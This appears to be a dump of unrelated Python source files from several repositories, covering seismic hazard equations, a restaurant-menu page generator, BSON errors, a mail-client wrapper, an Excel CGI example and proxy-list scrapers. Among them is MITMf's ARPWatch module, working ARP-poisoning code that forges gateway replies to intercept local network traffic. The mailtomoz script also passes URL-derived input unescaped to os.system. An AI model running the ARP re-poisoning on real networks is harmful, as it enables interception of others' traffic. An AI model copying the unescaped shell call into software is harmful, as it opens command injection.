# The Hazard Library # Copyright (C) 2012 GEM Foundation # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """ Module exports :class:`ChiouYoungs2008`. """ from __future__ import division import numpy as np from openquake.hazardlib.gsim.base import GMPE, CoeffsTable from openquake.hazardlib import const from openquake.hazardlib.imt import PGA, PGV, SA class ChiouYoungs2008(GMPE): """ Implements GMPE developed by Brian S.-J. Chiou and Robert R. Youngs and published as "An NGA Model for the Average Horizontal Component of Peak Ground Motion and Response Spectra" (2008, Earthquake Spectra, Volume 24, No. 1, pages 173-215). """ #: Supported tectonic region type is active shallow crust, see page 174. DEFINED_FOR_TECTONIC_REGION_TYPE = const.TRT.ACTIVE_SHALLOW_CRUST #: Supported intensity measure types are spectral acceleration, #: peak ground velocity and peak ground acceleration, see tables #: at pages 198 and 199. DEFINED_FOR_INTENSITY_MEASURE_TYPES = set([ PGA, PGV, SA ]) #: Supported intensity measure component is orientation-independent #: measure :attr:`~openquake.hazardlib.const.IMC.GMRotI50`, see page 174. DEFINED_FOR_INTENSITY_MEASURE_COMPONENT = const.IMC.GMRotI50 #: Supported standard deviation types are inter-event, intra-event #: and total, see chapter "Variance model". DEFINED_FOR_STANDARD_DEVIATION_TYPES = set([ const.StdDev.TOTAL, const.StdDev.INTER_EVENT, const.StdDev.INTRA_EVENT ]) #: Required site parameters are Vs30 (eq. 13b), Vs30 measured flag (eq. 20) #: and Z1.0 (eq. 13b). REQUIRES_SITES_PARAMETERS = set(('vs30', 'vs30measured', 'z1pt0')) #: Required rupture parameters are magnitude, rake (eq. 13a and 13b), #: dip (eq. 13a) and ztor (eq. 13a). REQUIRES_RUPTURE_PARAMETERS = set(('dip', 'rake', 'mag', 'ztor')) #: Required distance measures are RRup, Rjb and Rx (all are in eq. 13a). REQUIRES_DISTANCES = set(('rrup', 'rjb', 'rx')) def get_mean_and_stddevs(self, sites, rup, dists, imt, stddev_types): """ See :meth:`superclass method <.base.GroundShakingIntensityModel.get_mean_and_stddevs>` for spec of input and result values. """ # extracting dictionary of coefficients specific to required # intensity measure type. C = self.COEFFS[imt] # intensity on a reference soil is used for both mean # and stddev calculations. ln_y_ref = self._get_ln_y_ref(rup, dists, C) # exp1 and exp2 are parts of eq. 10 and eq. 13b, # calculate it once for both. exp1 = np.exp(C['phi3'] * (sites.vs30.clip(-np.inf, 1130) - 360)) exp2 = np.exp(C['phi3'] * (1130 - 360)) mean = self._get_mean(sites, C, ln_y_ref, exp1, exp2) stddevs = self._get_stddevs(sites, rup, C, stddev_types, ln_y_ref, exp1, exp2) return mean, stddevs def _get_mean(self, sites, C, ln_y_ref, exp1, exp2): """ Add site effects to an intensity. Implements eq. 13b. """ # we do not support estimating of basin depth and instead # rely on it being available (since we require it). 
z1pt0 = sites.z1pt0 # we consider random variables being zero since we want # to find the exact mean value. eta = epsilon = 0 ln_y = ( # first line of eq. 13b ln_y_ref + C['phi1'] * np.log(sites.vs30 / 1130).clip(-np.inf, 0) # second line + C['phi2'] * (exp1 - exp2) * np.log((np.exp(ln_y_ref) + C['phi4']) / C['phi4']) # third line + C['phi5'] * (1.0 - 1.0 / np.cosh( C['phi6'] * (z1pt0 - C['phi7']).clip(0, np.inf))) + C['phi8'] / np.cosh(0.15 * (z1pt0 - 15).clip(0, np.inf)) # fourth line + eta + epsilon ) return ln_y def _get_stddevs(self, sites, rup, C, stddev_types, ln_y_ref, exp1, exp2): """ Get standard deviation for a given intensity on reference soil. Implements equations 19, 20 and 21 for inter-event, intra-event and total standard deviations respectively. """ # aftershock flag is zero, we consider only main shock. AS = 0 Fmeasured = sites.vs30measured Finferred = 1 - sites.vs30measured # eq. 19 to calculate inter-event standard error mag_test = min(max(rup.mag, 5.0), 7.0) - 5.0 tau = C['tau1'] + (C['tau2'] - C['tau1']) / 2 * mag_test # b and c coeffs from eq. 10 b = C['phi2'] * (exp1 - exp2) c = C['phi4'] y_ref = np.exp(ln_y_ref) # eq. 20 NL = b * y_ref / (y_ref + c) sigma = ( # first line of eq. 20 (C['sig1'] + 0.5 * (C['sig2'] - C['sig1']) * mag_test + C['sig4'] * AS) # second line * np.sqrt((C['sig3'] * Finferred + 0.7 * Fmeasured) + (1 + NL) ** 2) ) ret = [] for stddev_type in stddev_types: assert stddev_type in self.DEFINED_FOR_STANDARD_DEVIATION_TYPES if stddev_type == const.StdDev.TOTAL: # eq. 21 ret += [np.sqrt(((1 + NL) ** 2) * (tau ** 2) + (sigma ** 2))] elif stddev_type == const.StdDev.INTRA_EVENT: ret.append(sigma) elif stddev_type == const.StdDev.INTER_EVENT: # this is implied in eq. 21 ret.append(np.abs((1 + NL) * tau)) return ret def _get_ln_y_ref(self, rup, dists, C): """ Get an intensity on a reference soil. Implements eq. 13a. """ # reverse faulting flag Frv = 1 if 30 <= rup.rake <= 150 else 0 # normal faulting flag Fnm = 1 if -120 <= rup.rake <= -60 else 0 # hanging wall flag Fhw = (dists.rx >= 0) # aftershock flag. always zero since we only consider main shock AS = 0 ln_y_ref = ( # first line of eq. 13a C['c1'] + (C['c1a'] * Frv + C['c1b'] * Fnm + C['c7'] * (rup.ztor - 4)) * (1 - AS) + (C['c10'] + C['c7a'] * (rup.ztor - 4)) * AS # second line + C['c2'] * (rup.mag - 6) + ((C['c2'] - C['c3']) / C['cn']) * np.log(1 + np.exp(C['cn'] * (C['cm'] - rup.mag))) # third line + C['c4'] * np.log(dists.rrup + C['c5'] * np.cosh(C['c6'] * max(rup.mag - C['chm'], 0))) # fourth line + (C['c4a'] - C['c4']) * np.log(np.sqrt(dists.rrup ** 2 + C['crb'] ** 2)) # fifth line + (C['cg1'] + C['cg2'] / (np.cosh(max(rup.mag - C['cg3'], 0)))) * dists.rrup # sixth line + C['c9'] * Fhw * np.tanh(dists.rx * (np.cos(np.radians(rup.dip)) ** 2) / C['c9a']) * (1 - np.sqrt(dists.rjb ** 2 + rup.ztor ** 2) / (dists.rrup + 0.001)) ) return ln_y_ref #: Coefficient tables are constructed from values in tables 1, 2 and 3 #: (pages 197, 198 and 199). Spectral acceleration is defined for damping #: of 5%, see page 208. 
COEFFS = CoeffsTable(sa_damping=5, table="""\ IMT c2 c3 c4 c4a crb chm cg3 c1 c1a c1b cn cm c5 c6 c7 c7a c9 c9a c10 cg1 cg2 phi1 phi2 phi3 phi4 phi5 phi6 phi7 phi8 tau1 tau2 sig1 sig2 sig3 sig4 pga 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.2687 0.1000 -0.2550 2.996 4.1840 6.1600 0.4893 0.0512 0.0860 0.7900 1.5005 -0.3218 -0.00804 -0.00785 -0.4417 -0.1417 -0.007010 0.102151 0.2289 0.014996 580.0 0.0700 0.3437 0.2637 0.4458 0.3459 0.8000 0.0663 pgv 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 2.2884 0.1094 -0.0626 1.648 4.2979 5.1700 0.4407 0.0207 0.0437 0.3079 2.6690 -0.1166 -0.00275 -0.00625 -0.7861 -0.0699 -0.008444 5.410000 0.2899 0.006718 459.0 0.1138 0.2539 0.2381 0.4496 0.3554 0.7504 0.0133 0.010 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.2687 0.1000 -0.2550 2.996 4.1840 6.1600 0.4893 0.0512 0.0860 0.7900 1.5005 -0.3218 -0.00804 -0.00785 -0.4417 -0.1417 -0.007010 0.102151 0.2289 0.014996 580.0 0.0700 0.3437 0.2637 0.4458 0.3459 0.8000 0.0663 0.020 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.2515 0.1000 -0.2550 3.292 4.1879 6.1580 0.4892 0.0512 0.0860 0.8129 1.5028 -0.3323 -0.00811 -0.00792 -0.4340 -0.1364 -0.007279 0.108360 0.2289 0.014996 580.0 0.0699 0.3471 0.2671 0.4458 0.3459 0.8000 0.0663 0.030 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.1744 0.1000 -0.2550 3.514 4.1556 6.1550 0.4890 0.0511 0.0860 0.8439 1.5071 -0.3394 -0.00839 -0.00819 -0.4177 -0.1403 -0.007354 0.119888 0.2289 0.014996 580.0 0.0701 0.3603 0.2803 0.4535 0.3537 0.8000 0.0663 0.040 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.0671 0.1000 -0.2550 3.563 4.1226 6.1508 0.4888 0.0508 0.0860 0.8740 1.5138 -0.3453 -0.00875 -0.00855 -0.4000 -0.1591 -0.006977 0.133641 0.2289 0.014996 579.9 0.0702 0.3718 0.2918 0.4589 0.3592 0.8000 0.0663 0.050 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.9464 0.1000 -0.2550 3.547 4.1011 6.1441 0.4884 0.0504 0.0860 0.8996 1.5230 -0.3502 -0.00912 -0.00891 -0.3903 -0.1862 -0.006467 0.148927 0.2290 0.014996 579.9 0.0701 0.3848 0.3048 0.4630 0.3635 0.8000 0.0663 0.075 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.7051 0.1000 -0.2540 3.448 4.0860 6.1200 0.4872 0.0495 0.0860 0.9442 1.5597 -0.3579 -0.00973 -0.00950 -0.4040 -0.2538 -0.005734 0.190596 0.2292 0.014996 579.6 0.0686 0.3878 0.3129 0.4702 0.3713 0.8000 0.0663 0.10 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.5747 0.1000 -0.2530 3.312 4.1030 6.0850 0.4854 0.0489 0.0860 0.9677 1.6104 -0.3604 -0.00975 -0.00952 -0.4423 -0.2943 -0.005604 0.230662 0.2297 0.014996 579.2 0.0646 0.3835 0.3152 0.4747 0.3769 0.8000 0.0663 0.15 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.5309 0.1000 -0.2500 3.044 4.1717 5.9871 0.4808 0.0479 0.0860 0.9660 1.7549 -0.3565 -0.00883 -0.00862 -0.5162 -0.3113 -0.005845 0.266468 0.2326 0.014988 577.2 0.0494 0.3719 0.3128 0.4798 0.3847 0.8000 0.0612 0.20 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.6352 0.1000 -0.2449 2.831 4.2476 5.8699 0.4755 0.0471 0.0860 0.9334 1.9157 -0.3470 -0.00778 -0.00759 -0.5697 -0.2927 -0.006141 0.255253 0.2386 0.014964 573.9 -0.0019 0.3601 0.3076 0.4816 0.3902 0.8000 0.0530 0.25 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.7766 0.1000 -0.2382 2.658 4.3184 5.7547 0.4706 0.0464 0.0860 0.8946 2.0709 -0.3379 -0.00688 -0.00671 -0.6109 -0.2662 -0.006439 0.231541 0.2497 0.014881 568.5 -0.0479 0.3522 0.3047 0.4815 0.3946 0.7999 0.0457 0.30 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -0.9278 0.0999 -0.2313 2.505 4.3844 5.6527 0.4665 0.0458 0.0860 0.8590 2.2005 -0.3314 -0.00612 -0.00598 -0.6444 -0.2405 -0.006704 0.207277 0.2674 0.014639 560.5 -0.0756 0.3438 0.3005 0.4801 0.3981 0.7997 0.0398 0.40 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.2176 0.0997 -0.2146 2.261 4.4979 5.4997 0.4607 0.0445 0.0850 0.8019 2.3886 -0.3256 
-0.00498 -0.00486 -0.6931 -0.1975 -0.007125 0.165464 0.3120 0.013493 540.0 -0.0960 0.3351 0.2984 0.4758 0.4036 0.7988 0.0312 0.50 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.4695 0.0991 -0.1972 2.087 4.5881 5.4029 0.4571 0.0429 0.0830 0.7578 2.5000 -0.3189 -0.00420 -0.00410 -0.7246 -0.1633 -0.007435 0.133828 0.3610 0.011133 512.9 -0.0998 0.3353 0.3036 0.4710 0.4079 0.7966 0.0255 0.75 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.9278 0.0936 -0.1620 1.812 4.7571 5.2900 0.4531 0.0387 0.0690 0.6788 2.6224 -0.2702 -0.00308 -0.00301 -0.7708 -0.1028 -0.008120 0.085153 0.4353 0.006739 441.9 -0.0765 0.3429 0.3205 0.4621 0.4157 0.7792 0.0175 1.0 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -2.2453 0.0766 -0.1400 1.648 4.8820 5.2480 0.4517 0.0350 0.0450 0.6196 2.6690 -0.2059 -0.00246 -0.00241 -0.7990 -0.0699 -0.008444 0.058595 0.4629 0.005749 391.8 -0.0412 0.3577 0.3419 0.4581 0.4213 0.7504 0.0133 1.5 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -2.7307 0.0022 -0.1184 1.511 5.0697 5.2194 0.4507 0.0280 0.0134 0.5101 2.6985 -0.0852 -0.00180 -0.00176 -0.8382 -0.0425 -0.007707 0.031787 0.4756 0.005544 348.1 0.0140 0.3769 0.3703 0.4493 0.4213 0.7136 0.0090 2.0 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -3.1413 -0.0591 -0.1100 1.470 5.2173 5.2099 0.4504 0.0213 0.0040 0.3917 2.7085 0.0160 -0.00147 -0.00143 -0.8663 -0.0302 -0.004792 0.019716 0.4785 0.005521 332.5 0.0544 0.4023 0.4023 0.4459 0.4213 0.7035 0.0068 3.0 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -3.7413 -0.0931 -0.1040 1.456 5.4385 5.2040 0.4501 0.0106 0.0010 0.1244 2.7145 0.1876 -0.00117 -0.00115 -0.9032 -0.0129 -0.001828 0.009643 0.4796 0.005517 324.1 0.1232 0.4406 0.4406 0.4433 0.4213 0.7006 0.0045 4.0 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -4.1814 -0.0982 -0.1020 1.465 5.5977 5.2020 0.4501 0.0041 0.0000 0.0086 2.7164 0.3378 -0.00107 -0.00104 -0.9231 -0.0016 -0.001523 0.005379 0.4799 0.005517 321.7 0.1859 0.4784 0.4784 0.4424 0.4213 0.7001 0.0034 5.0 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -4.5187 -0.0994 -0.1010 1.478 5.7276 5.2010 0.4500 0.0010 0.0000 0.0000 2.7172 0.4579 -0.00102 -0.00099 -0.9222 0.0000 -0.001440 0.003223 0.4799 0.005517 320.9 0.2295 0.5074 0.5074 0.4420 0.4213 0.7000 0.0027 7.5 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -5.1224 -0.0999 -0.1010 1.498 5.9891 5.2000 0.4500 0.0000 0.0000 0.0000 2.7177 0.7514 -0.00096 -0.00094 -0.8346 0.0000 -0.001369 0.001134 0.4800 0.005517 320.3 0.2660 0.5328 0.5328 0.4416 0.4213 0.7000 0.0018 10.0 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -5.5872 -0.1000 -0.1000 1.502 6.1930 5.2000 0.4500 0.0000 0.0000 0.0000 2.7180 1.1856 -0.00094 -0.00091 -0.7332 0.0000 -0.001361 0.000515 0.4800 0.005517 320.1 0.2682 0.5542 0.5542 0.4414 0.4213 0.7000 0.0014 """)
ROB-Seismology/oq-hazardlib
openquake/hazardlib/gsim/chiou_youngs_2008.py
Python
agpl-3.0
14,566
#!/usr/bin/env python3 # Copyright (c) 2014-2021, Linus Östberg and contributors # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of kimenu nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ Main script for choosing what restaurant parsers to use. """ import json import os import sys import parser as ps __location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__))) REST_FILENAME = os.path.join(__location__, "restaurants.json") def read_restaurants(intext: str) -> dict: """ Parse the list of restaurants from the restaurants file. Args: intext(str): The text loaded from the restaurants file. """ indata = json.loads(intext) data = dict() for entry in indata["restaurants"]: data[entry["identifier"]] = entry return data REST_DATA = read_restaurants(open(REST_FILENAME).read()) # works as ordered dict as well, but must be _ordered_ MAPPER = { "jorpes": ps.parse_jorpes, "glada": ps.parse_glada, "haga": ps.parse_haga, "hjulet": ps.parse_hjulet, "jons": ps.parse_jons, "livet": ps.parse_livet, "nanna": ps.parse_nanna, "svarta": ps.parse_svarta, "bikupan": ps.parse_bikupan, "dufva": ps.parse_dufva, "hubben": ps.parse_hubben, "rudbeck": ps.parse_rudbeck, "tallrik": ps.parse_tallrik, } KI = ("jorpes", "glada", "haga", "hjulet", "jons", "livet", "nanna", "svarta") UU = ("bikupan", "dufva", "hubben", "rudbeck", "tallrik") def activate_parsers(restaurants, restaurant_data): """ Run the wanted parsers """ output = [] for restaurant in restaurants: data = MAPPER[restaurant](restaurant_data[restaurant]) output.append( f"""<div class="title"><a href="{data['url']}">{data['title']}</a>""" ) output.append(f"""(<a href="{data['map_url']}">{data['location']}</a>)</div>""") if "menu" in data: output.append('<div class="menu">') output.append("<p>") output.append("<br />\n".join(data["menu"])) output.append("</p>") output.append("</div>") return "\n".join(output) def get_restaurant(name: str) -> dict: """ Request the menu of a restaurant """ if name in MAPPER: return MAPPER[name](REST_DATA[name]) else: return {} def list_restaurants(): """ List all supported restaurants. 
""" return list(REST_DATA.values()) def page_end(): """ Print the closure of tags etc """ lines = list() lines.append( '<div class="endnote">Code available at ' + '<a href="https://github.com/talavis/lunch-menu">' + "Github</a>. Patches are very welcome.</div>" ) lines.append("</body>") lines.append("</html>") return lines def page_start(weekday, day, month): """ Print the initialisation of the page """ lines = list() lines.append("<html>") lines.append("<head>") date = weekday.capitalize() + " " + str(day) + " " + str(month) lines.append("<title>Dagens mat - {}</title>".format(date)) lines.append('<link href="styles.css" rel="stylesheet" type="text/css">') lines.append('<style type="text/css"></style>') lines.append("</head>") lines.append("<body>") # page formatting lines.append("") return lines def parse_restaurant_names(rest_names): """ Decide what restaurants to generate menus for """ restaurants = list() for param in rest_names: if param not in KI and param not in UU: raise ValueError("{} not a valid restaurant".format(param)) restaurants.append(param.lower()) return restaurants def print_usage(supported): """ Print description of syntax """ sys.stderr.write("Usage: {} restaurant1 [...] \n".format(sys.argv[0])) sys.stderr.write("Supported restaurants: {}\n".format(", ".join(sorted(supported)))) sys.stderr.write("Write all to generate all supported restaurants\n") def gen_ki_menu(): """ Generate a menu for restaurants at KI """ output = "" output += "\n".join(page_start(ps.get_weekday(), str(ps.get_day()), ps.get_month())) output += activate_parsers(KI, REST_DATA) output += "\n".join(page_end()) return output def gen_uu_menu(): """ Generate a menu for restaurants at UU """ output = "" output += "\n".join(page_start(ps.get_weekday(), str(ps.get_day()), ps.get_month())) output += activate_parsers(UU, REST_DATA) output += "\n".join(page_end()) sys.stderr.write(output + "\n") return output if __name__ == "__main__": if len(sys.argv) < 2 or "-h" in sys.argv: print_usage(KI + UU) sys.exit() REST_NAMES_IN = tuple() if "all" in sys.argv[1:]: REST_NAMES_IN += KI + UU elif "ki" in sys.argv[1:]: REST_NAMES_IN += KI elif "uu" in sys.argv[1:]: REST_NAMES_IN += UU else: REST_NAMES_IN = [param for param in sys.argv[1:] if param != "-r"] try: REST_NAMES = parse_restaurant_names(REST_NAMES_IN) except ValueError as err: sys.stderr.write("E: {}\n".format(err)) print_usage((x for x in MAPPER)) sys.exit(1) # print the menus print("\n".join(page_start(ps.get_weekday(), str(ps.get_day()), ps.get_month()))) print(activate_parsers(REST_NAMES, REST_DATA)) print("\n".join(page_end()))
talavis/kimenu
backend/main.py
Python
bsd-3-clause
6,810
# Copyright 2009-2010 10gen, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Exceptions raised by the BSON package.""" class BSONError(Exception): """Base class for all BSON exceptions. """ class InvalidBSON(BSONError): """Raised when trying to create a BSON object from invalid data. """ class InvalidStringData(BSONError): """Raised when trying to encode a string containing non-UTF8 data. """ class InvalidDocument(BSONError): """Raised when trying to create a BSON object from an invalid document. """ class InvalidId(BSONError): """Raised when trying to create an ObjectId from invalid data. """
couchbaselabs/litmus
lib/bson/errors.py
Python
apache-2.0
1,154
## Copyright 2003-2009 Luc Saffre
## This file is part of the TimTools project.
## TimTools is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
## TimTools is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with TimTools; if not, see <http://www.gnu.org/licenses/>.

"""
Wrapper to convert the `mailto` syntax (as used by browsers to call an
external mail client) to Mozilla's "-compose" command-line syntax.

Workaround for http://bugzilla.mozilla.org/show_bug.cgi?id=220306

USAGE: timtools mailtomoz MOZILLA MAILTO

Where:

  MOZILLA is the filename including path of your mozilla.exe

  MAILTO is a string of the form::

    mailto:[email protected]?subject=bla,body=blabla

mailtomoz will then do the following system call::

  MOZILLA -compose [email protected],subject=bla,body=blabla

To use this script, you must edit your registry and modify the value of
`HKEY_CLASSES_ROOT\mailto\shell\open\command` to something like::

  timtools mailtomoz "C:\Program files\mozilla.org\mozilla.exe" "%1"
  # or "C:\Programme\mozilla.org\Mozilla\mozilla.exe "

When bug 220306 is fixed, change this entry back to::

  C:\Programme\mozilla.org\Mozilla\mozilla.exe -mail %1

See also `openmail <openmail.html>`_.

"""

import sys, os
import urllib

from timtools.ui.console import confirm

if __name__ == '__main__':

    mozilla = sys.argv[1]
    mailto = sys.argv[2]

    l = mailto.split(":", 2)
    assert len(l) == 2
    assert l[0] == "mailto"
    #assert arg.startswith("mailto:")

    subject = None
    body = None

    l = l[1].split("?", 2)
    assert len(l) >= 1
    to = urllib.unquote(l[0])
    if len(l) == 2:
        l = l[1].split('&')
        for i in l:
            name, value = i.split('=')
            if name.lower() == 'subject':
                subject = urllib.unquote(value.strip())
            elif name.lower() == 'body':
                body = urllib.unquote(value.strip())

    args = 'to=%s' % to
    if subject:
        args += ',subject=%s' % subject
    if body:
        body = body.replace('\n', '\\n')
        body = body.replace('"', '\\"')
        args += ',body=%s' % body

    cmd = mozilla + ' -compose "%s"' % args
    print cmd
    # raising a bare string is not valid in Python 2.6+; raise a real exception instead
    if not confirm("okay"):
        raise Exception("not ok")
    os.system(cmd)
lsaffre/timtools
timtools/scripts/mailtomoz.py
Python
bsd-2-clause
2,745
from django.contrib import admin from rcs.wiki.models import WikiPage, WikiAttachment admin.site.register(WikiPage) admin.site.register(WikiAttachment)
ShuffleBox/django-rcsfield
rcs/wiki/admin.py
Python
bsd-3-clause
152
import logging import os import sys import threading from scapy.all import * from core.utils import shutdown mitmf_logger = logging.getLogger('mitmf') class ARPWatch: def __init__(self, gatewayip, myip, interface): self.gatewayip = gatewayip self.gatewaymac = None self.myip = myip self.interface = interface self.debug = False self.watch = True def start(self): try: self.gatewaymac = getmacbyip(self.gatewayip) if self.gatewaymac is None: shutdown("[ARPWatch] Error: Could not resolve gateway's MAC address") except Exception, e: shutdown("[ARPWatch] Exception occured while resolving gateway's MAC address: {}".format(e)) mitmf_logger.debug("[ARPWatch] gatewayip => {}".format(self.gatewayip)) mitmf_logger.debug("[ARPWatch] gatewaymac => {}".format(self.gatewaymac)) mitmf_logger.debug("[ARPWatch] myip => {}".format(self.myip)) mitmf_logger.debug("[ARPWatch] interface => {}".format(self.interface)) t = threading.Thread(name='ARPWatch', target=self.startARPWatch) t.setDaemon(True) t.start() def stop(self): mitmf_logger.debug("[ARPWatch] shutting down") self.watch = False def startARPWatch(self): sniff(prn=self.arp_monitor_callback, filter="arp", store=0) def arp_monitor_callback(self, pkt): if self.watch is True: #Prevents sending packets on exiting if ARP in pkt and pkt[ARP].op == 1: #who-has only #broadcast mac is 00:00:00:00:00:00 packet = None #print str(pkt[ARP].hwsrc) #mac of sender #print str(pkt[ARP].psrc) #ip of sender #print str(pkt[ARP].hwdst) #mac of destination (often broadcst) #print str(pkt[ARP].pdst) #ip of destination (Who is ...?) if (str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and str(pkt[ARP].pdst) == self.gatewayip and self.myip != str(pkt[ARP].psrc)): mitmf_logger.debug("[ARPWatch] {} is asking where the Gateway is. Sending reply: I'm the gateway biatch!'".format(pkt[ARP].psrc)) #send repoison packet packet = ARP() packet.op = 2 packet.psrc = self.gatewayip packet.hwdst = str(pkt[ARP].hwsrc) packet.pdst = str(pkt[ARP].psrc) elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip != str(pkt[ARP].pdst)): mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: I'm {} biatch!".format(pkt[ARP].pdst, pkt[ARP].pdst)) #send repoison packet packet = ARP() packet.op = 2 packet.psrc = self.gatewayip packet.hwdst = '00:00:00:00:00:00' packet.pdst = str(pkt[ARP].pdst) elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip == str(pkt[ARP].pdst)): mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: This is the h4xx0r box!".format(pkt[ARP].pdst)) packet = ARP() packet.op = 2 packet.psrc = self.myip packet.hwdst = str(pkt[ARP].hwsrc) packet.pdst = str(pkt[ARP].psrc) try: if packet is not None: send(packet, verbose=self.debug, iface=self.interface) except Exception, e: mitmf_logger.error("[ARPWatch] Error sending re-poison packet: {}".format(e)) pass
0x27/MITMf
core/poisoners/arp/ARPWatch.py
Python
gpl-3.0
3,878
#!/usr/bin/env python # This example script was ported from Perl Spreadsheet::WriteExcel module. # The author of the Spreadsheet::WriteExcel module is John McNamara # <[email protected]> __revision__ = """$Id: cgi.py,v 1.1 2004/01/31 18:57:53 fufff Exp $""" ############################################################################### # # Example of how to use the Spreadsheet::WriteExcel module to send an Excel # file to a browser in a CGI program. # # On Windows the hash-bang line should be something like: # #!C:\Perl\bin\perl.exe # # reverse('(c)'), March 2001, John McNamara, [email protected] # import sys import pyXLWriter as xl # Set the filename and send the content type filename = "cgitest.xls" print "Content-type: application/vnd.ms-excel" # The Content-Disposition will generate a prompt to save the file. If you want # to stream the file to the browser, comment out the following line. print "Content-Disposition: attachment; filename=%s" % filename print # Create a new workbook and add a worksheet. The special Perl filehandle - will # redirect the output to STDOUT # workbook = xl.Writer(sys.stdout) worksheet = workbook.add_worksheet() # Set the column width for column 1 worksheet.set_column(0, 20) # Create a format format = workbook.add_format() format.set_bold(); format.set_size(15); format.set_color('blue') # Write to the workbook worksheet.write([0, 0], "Hi Excel!", format) workbook.close()
evgenybf/pyXLWriter
examples/cgi.py
Python
lgpl-2.1
1,436
# coding: utf-8 from __future__ import unicode_literals import Queue import threading class BaseProducer(threading.Thread): def __init__(self, q, name='BasePro', pages=1): super(BaseProducer, self).__init__() self.q = q self.name = name self.pages = pages self.offset = 1 self.url = '' self.type = 0 def run(self): while True: resource = {} resource['url'] = '{0}{1}'.format(self.url, self.offset) resource['type'] = self.type try: self.q.put(resource, block=True, timeout=3) except Queue.Full: pass else: print '{0} now in queue'.format(self.offset) if self.offset < self.pages: self.offset += 1 else: break print '{0} finish produce works'.format(self.name) class XiCiProducer(BaseProducer): def __init__(self, q, name='XiCiPro', pages=713): super(XiCiProducer, self).__init__(q, name, pages) self.type = 1 self.url = 'http://www.xicidaili.com/nn/' class KuaiProducer(BaseProducer): def __init__(self, q, name='KuaiPro', pages=966): super(KuaiProducer, self).__init__(q, name, pages) self.type = 2 self.url = 'http://www.kuaidaili.com/free/inha/' class LiuLiuProducer(BaseProducer): def __init__(self, q, name='LiuLiuPro', pages=1): super(LiuLiuProducer, self).__init__(q, name, pages) self.type = 3 self.url = 'http://www.66ip.cn/nmtq.php?getnum=10000&isp=0&anonymoustype=3&start=&ports=&export=&ipaddress=&area=1&proxytype=0&api=66ip' def run(self): while True: resource = {} resource['url'] = self.url resource['type'] = self.type try: self.q.put(resource, block=True, timeout=3) except Queue.Full: pass else: 